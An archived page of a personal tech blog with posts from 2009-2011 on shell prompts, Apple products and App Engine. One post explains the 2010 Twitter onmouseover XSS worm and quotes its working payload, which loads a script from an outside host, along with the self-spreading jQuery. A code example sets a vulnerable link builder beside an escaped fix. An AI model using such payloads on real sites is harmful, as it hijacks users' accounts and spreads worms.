Interviewed (Hebrew) on Hadoop at CodeRadio

Hadoop, Programming May 29th, 2011

I’ve met with Ariel and Shy from CodeRadio.co.il to talk about Hadoop technologies. You can go ahead and listen (or download on your iTunes) here:

http://www.coderadio.co.il/?p=69

(Yes, it’s been a while, but I’ve failed to update here :) )


Show the Current RVM Info in Your Command Prompt

Programming February 7th, 2011

I’ve recently started using RVM to manage the Ruby versions and gemsets of the different projects I’m working on.
So, much like showing the current Git branch, it’s really useful to show the current RVM environment as part of the command prompt. So I just added rvm-prompt to the previous snippet; the line below relies on the colour variables and the parse_git_branch function defined there.
To use this, just add the following to your ~/.profile file:

PS1="$GREEN\u@machine$NO_COLOUR:\w:$LIGHT_GRAY\$(~/.rvm/bin/rvm-prompt i v g)$NO_COLOUR:$YELLOW\$(parse_git_branch)$NO_COLOUR\$ "


Show the Current GIT Branch in Your Command Prompt

Programming January 10th, 2011

One of the most confusing things when working with multiple branches in git is having to remember the branch you’re currently working on.
Typing git branch all the time is annoying…

That’s why I’ve set my shell’s prompt to display the current branch!
Just add the following to your ~/.profile file:


Mac App Store Insights

Technology January 8th, 2011

It’s not in iTunes

When hearing the news that the Mac App Store was launched I immediately opened iTunes, but didn’t find it there.
I went online and read that an OS X update is required, so I ran Software Update. There was no iTunes update but there was an OS X update, so I figured the new App Store must be in the Applications folder.

Apparently I’m not the only one who got confused… Apple had to add a tutorial explaining how to get to the store (click the Get the Mac App Store button)

What does it mean that the Mac store is separated from, well, everything else? I guess we’ll have to wait and see…

Pricing

The first thing you notice about the Mac App Store is that its prices seem expensive.
Prices in the Mac App Store are significantly higher than those in the iOS App Store. This is probably because Mac App Store prices are anchored to whatever current software developers (including Apple) are charging on other channels, unlike the iOS App Store, which opened up a brand new market.

I’m hoping that, unlike the iOS App Store, the Mac App Store won’t fall into the prices-race-to-the-bottom trap, so that it can become a viable channel for independent developers without them having to sell their software at a loss and look for alternative income.
However, as the store becomes more popular and crowded that will probably be the case, as lowering prices is the best way to get noticed…

For more details, here’s a detailed pricing breakdown of the Mac App Store.

UI Design isn’t strongly enforced

Apple has been pretty strict about enforcing its HIG (Human Interface Guidelines) on iOS apps. It’s not as strict when it comes to the Mac…
Application developers have much more liberty in choosing their interface design, which is not necessarily good, as apps differ in behaviour and confuse users (not an App Store example, but I personally hate the Mac Photoshop interface, which instead of acting like a window like any other app is… umm… some weird toolbars thingie…).
You can find a showcase of the Mac App Store worst app interfaces at the Read the fucking HIG blog :)

Software Updates

One of the App Store’s benefits is being able to update installed apps with one click.
The difference from the iOS App Store is that certain apps can be installed from other distribution channels, not just from the App Store.
However, even if you didn’t install your app through the Mac App Store, it is still likely that the Mac App Store will recognize your app and support updating it.
Which is pretty neat :)

According to this, it seems that the Mac App Store matches the software using the software’s bundle ID and version number:

DEVELOPER UPDATE: seems it’s all about the bundle ID and version number. These are the same for our Mac App Store build and our direct download build. So the Mac App Store thinks the app is installed, even if it’s a trial downloaded from our website. In some ways, actually, this is good for the customer — it prevents accidental or mistaken unnecessary re-purchases! But, it means you have to drag to trash if you want to purchase from the MAS. (I think Apple should use the bundle ID in conjunction with Apple ID purchase history to decide if the button should say “Buy” or not. And maybe if the Bundle ID matches but no purchase in their history, there’s a “Are you sure you need this?” dialog for safety.)

Small Store, Big Opportunity

The Mac App Store is still very small. It only has about 1000 apps, which sounds like a lot but really isn’t… and most of them are kinda crappy…
There’s a very good opportunity here to catch some early attention with a good app…


The Complete Guide to Setting up Python Development Environment on Windows

Programming, Python September 23rd, 2010

Setting up Python for development on Windows turns out not to be such an easy task.
After setting up several such environments and running into all sorts of problems I had to figure out, I decided it would probably be worthwhile for myself and other developers to document the process…

If you’re starting Python development on Windows, and especially if you’re using Google App Engine (as this guide is about Python 2.5.4) this guide is for you…


Write your own Twitter.com XSS exploit

Programming, Technology September 21st, 2010

So it seems the new twitter.com has a “virus” going around.
A few minutes ago my Twitter stream filled up with strange jQuery calls, so I looked into it.

Apparently the new Twitter website is vulnerable to a simple injection attack, the same class of bug as SQL injection but in HTML: it spits out to the page whatever HTML code you write in your status, without escaping it.

So, the exploit works like this:

Step 1:

User writes the following status line:

http://t.co/@"style="font-size:999999999999px;"onmouseover="$.getScript('http:\u002f\u002fis.gd\u002ffl9A7')"/

The @" closes the tweet’s HTML element title attribute (the quote ends the attribute value) and lets the attacker add his own attributes, specifically an onmouseover attribute that runs his JavaScript code whenever a user hovers over the tweet.

Step 2:

The onmouseover handler fetches and executes a remote JavaScript file from

http://is.gd/fl9A7

Step 3:

The remote script (which, unlike the script embedded in the user’s status, is not subject to size limits) can do basically whatever the attacker wants.
This one just manipulates the page’s HTML to submit a new tweet (the one from step 1) and spread itself:

// Step 1's payload goes into the victim's status box (the backslash-newline continues the string literal)
$('#status').val("http://t.co/@\"style=\"font-size:999999999999px;\"\
onmouseover=\"$.getScript('http:\\u002f\\u002fis.gd\\u002ffl9A7')\"/");
// ...and is tweeted from the victim's account, which is how the worm spreads
$('.status-update-form').submit();
// Cosmetic defacement of the character counter, then a second, visible tweet
$('#status-field-char-counter').html("ekampf owns you!");
$('#status').val('I read how to do this on DeveloperZen.com');
$('.status-update-form').submit();

Besides submitting tweets, you can pretty much do whatever you want with the page’s UI etc…
lots of fun…
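To make the "@" trick concrete, here is an added example (mine, not code from the original post or from Twitter): a toy linkifier that reproduces the class of bug behind the worm next to a fixed version, run on the exact payload quoted in step 1. The real Twitter code is not shown on this page; the linkifier and the little attribute scanner below are simplified stand-ins.

```javascript
// Added example (not code from the original post or from Twitter): a toy
// linkifier that reproduces the class of bug behind the worm, next to a fixed
// version, run on the payload quoted in the post. The real Twitter code is
// not shown here; this is a simplified stand-in.

// The status text from step 1, exactly as it appears in the post. The \u002f
// sequences are literal backslash-u text in the tweet; the browser's JS engine
// only turns them into '/' once the onmouseover attribute is executed, which
// keeps Twitter's URL detector from auto-linking the second URL.
const PAYLOAD = 'http://t.co/@"style="font-size:999999999999px;"' +
  'onmouseover="$.getScript(\'http:\\u002f\\u002fis.gd\\u002ffl9A7\')"/';

// Vulnerable: the matched URL is pasted straight into the attributes.
// The payload's  @"  terminates the attribute value, and the rest of the
// text becomes new attributes on the <a> element (style, onmouseover).
function linkifyVulnerable(text) {
  return text.replace(/https?:\/\/\S+/g, (url) =>
    '<a href="' + url + '" title="' + url + '">' + url + '</a>');
}

// Escape the characters that can change meaning in element text or inside
// a double- or single-quoted attribute value.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return s.replace(/[&<>"']/g, (c) => map[c]);
}

// Fixed: every user-controlled value is escaped before it is placed in an
// attribute or in element text, so a quote in the status can no longer close
// the attribute. (The regex only matches http(s) URLs, so a javascript: URL
// is never turned into a link in the first place.)
function linkifyFixed(text) {
  return text.replace(/https?:\/\/\S+/g, (url) => {
    const safe = escapeHtml(url);
    return '<a href="' + safe + '" title="' + safe + '">' + safe + '</a>';
  });
}

// Minimal attribute-name scanner for one <a ...> start tag, mimicking how a
// browser tokenizes attributes: a quoted value ends at the matching quote and
// whatever follows, even with no whitespace, starts the next attribute name.
function attributeNames(html) {
  const m = /^<a\s+([\s\S]*?)>/.exec(html);
  if (!m) return [];
  const body = m[1];
  const names = [];
  let i = 0;
  const skipSpace = () => { while (i < body.length && /\s/.test(body[i])) i++; };
  while (i < body.length) {
    skipSpace();
    let name = '';
    while (i < body.length && !/[\s=]/.test(body[i])) name += body[i++];
    if (name) names.push(name);
    skipSpace();
    if (body[i] === '=') {
      i++;
      skipSpace();
      const q = body[i];
      if (q === '"' || q === "'") {
        const end = body.indexOf(q, i + 1);
        i = end === -1 ? body.length : end + 1;
      } else {
        while (i < body.length && !/\s/.test(body[i])) i++;
      }
    }
  }
  return names;
}

console.log('vulnerable:', attributeNames(linkifyVulnerable(PAYLOAD)).join(' '));
console.log('fixed:     ', attributeNames(linkifyFixed(PAYLOAD)).join(' '));
```

Running it, the vulnerable output grows style and onmouseover attributes that the tweet author controls, while the fixed output has only the href and title the template intended; the entire payload survives as harmless text inside the quotes.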


New DeveloperZen

Blogging September 19th, 2010

DeveloperZen has a new design!
There’s still some work to be done and empty content pages to be filled, so there’s going to be a lot of re-organizing
in the following days (especially the categories list, which needs to be optimized).

Would love to hear your comments about the new design and the blog in general…

What the new Apple TV is really missing…

Technology September 2nd, 2010

I was watching the Apple launch event the other day and I must say I was a bit disappointed.
Don’t get me wrong, the device is small and slick and the $99 price puts it in the right range to compete with other streamers in the market.
The problem is that, besides connecting to iTunes, the Apple TV isn’t much different from the rest of the bunch.
Apple isn’t taking advantage of its platform strengths the same way it’s doing with its other devices…

Why isn’t the Apple TV Social?

Apple just launched its own social network – Ping. Why isn’t Ping data featured on the Apple TV?
I’d like to see what my friends watched, get recommendations and share stuff I like.

Where are the Apps?!

The iPhone, iPod and iPad are thriving on a vibrant Apps market. Why can’t the Apple TV do the same?
I was really expecting an iOS-driven device where developers could enhance the Apple TV’s capabilities by providing apps specifically designed to run on a TV set with limited controls.

You could browse social networks (Facebook, Twitter etc.), or watch stock market information, or browse content from your favourite feeds and content providers (imagine something like the iPad’s Flipboard on your big LCD TV), or cook with your TV’s help (imagine Jamie Oliver’s iPhone app on the big screen), or get apps from content providers (local news channels, for example) that would be able to stream their own content…
There’s tons of stuff developers could do with the Apple TV if given the option.

Apple could have really taken the streamers to a whole new level with this…

In short, I wish the Apple TV would be more like Boxee :)


3 Takeaways from the Apple iPad Launch

Technology January 28th, 2010

A Computer That Doesn’t Feel Like A Computer

It’s not a geek device, it’s a computing appliance. The iPad is a computer with an iPhone OS. Not a full-fledged OS like we’re used to: no multitasking, terminal, filesystems…
Just a list of Apps that can be installed and updated from the net. Simple, elegant, and exactly what most people who aren’t computer geeks need.
The perfect “laptop” for mom and dad…


Apple Sells Relationship, Not Hardware

The iPad’s amazing pricing just shows that Apple is really counting on people using the heck out of their device… that means buying apps, books, music and videos. It’s building a relationship with its customers that gets stronger and stronger with each purchase on iTunes.

Customers who have all their applications, games, books, music and videos on iTunes are locked in the Apple ecosystem. They’re vested in it…
They’re not going to easily switch to an Android or a Zune…

HP\Dell\Asus\etc. only make money the moment you purchase their hardware (and on support and stuff); it makes no difference to them whether you use it or not. Microsoft too only makes money when you buy your Windows license.

Apple, on the other hand, keeps monetizing its customers long after they’ve left the Apple Store with their latest new device, every time they buy content for it. It keeps and nurtures a profitable relationship with its customers, and that’s a way better business than a one-off hardware\license sale…

(btw, Microsoft is learning about making profit from a relationship too… that’s what drives its Xbox business)

iBooks Can Change the Publishing Industry

Before the iTunes Music Store, buying songs at a ridiculous 99c price was inconceivable. The iPhone App Store did the same to applications, changing the economy (check out this excellent App Economy graphic) of applications by driving prices down.

The same could (and probably will) happen with books… but there’s more!

Unlike Amazon’s Kindle (and Sony’s reader and the rest of the bunch), which support very limited interaction (text and some grey imagery), the iPad comes with a big, colourful touchscreen and a CPU that can handle 3D gaming.
The iPad’s hardware is perfect for interactive content, and the Times Magazine demo shown during the launch gives a glimpse of how our future books and magazines should look and feel on electronic media.
Electronic “print” is going to be much more interactive and rich, which means the entire process of book production changes.
The publishers’ role changes from mass printing and delivery to production of interactive content, the way authors work changes, and distribution costs drop…


The New Google App Engine Blobstore API – First Thoughts

Cloud Computing, Programming December 15th, 2009

Google’s App Engine 1.3.0 was released yesterday along with a brand new Blobstore API allowing the storage and serving of files up to 50MB.

Store and Serve – Files can be uploaded and stored as blobs, to be served later in response to user requests. Developers can build their own organizational structures and access controls on top of blobs.

The way this API works is pretty simple. To upload files you call an API that manufactures a POST URL to which web form requests containing the file data are submitted. App Engine processes the POST request and creates the blobs in its storage (plus BlobInfo objects, read-only datastore entities holding the metadata of each blob). It then rewrites the request, removing the uploaded file data and replacing it with a Blobstore key pointing to the stored blob in the App Engine Blobstore, and calls your handler with this rewritten request.

To serve an existing blob in your app, you put a special header in the response containing the blob key. App Engine replaces the body of the response with the content of the blob.

Now this is pretty straightforward, but there are a few concerns with this approach:

1. What about request validation (authentication\authorization etc.)?

When uploading files, the request reaches your code only after the blobs have already been processed and stored. This means you can only handle authentication\authorization, or even form validation, after the data has been stored.

This means you’ll have to write code to clean up the relevant blob entries whenever authentication\authorization\validation fails: more datastore API calls, more CPU…

It also means that without taking care of these special cases any newbie hacker with a simple sniffer (or Firebug) can start uploading (and potentially serving) files off your service (see update).

2. No way to preprocess data

As the file data is already stored before the program’s handler is called, there’s no way to preprocess submitted data other than reading it from the store, processing it and storing it again.

There’s also no straightforward API to access or store blob data in code, so the above has to be implemented using URL fetching (fetch the image via an HTTP call, process it, store it again using an HTTP POST).

There must be a way for the Google App Engine team to wrap this up nicely and provide a clean API for doing this efficiently (along with solving the validation problem described above).

As the Blobstore API is still in an experimental phase, I guess we’ll see some quick progress made on its development, and hopefully the Google team will solve the issues above.

At least now there’s the beginning of an alternative to Amazon S3 for App Engine applications.

Update:

Brett Slatkin notes that when the API manufactures the POST URL to be used for uploading the files, it creates a unique one-time URL, which mitigates any potential sniffing.
This fits perfectly the scenario where you’re rendering a web form to be submitted by the user. But it makes things harder if you’re trying to provide a REST API that allows uploading files (think of something like TwitPic, for example). In that case you’ll have to write your own code that simulates what a web form would do (receive the files, create the one-time POST URL, call it, …).
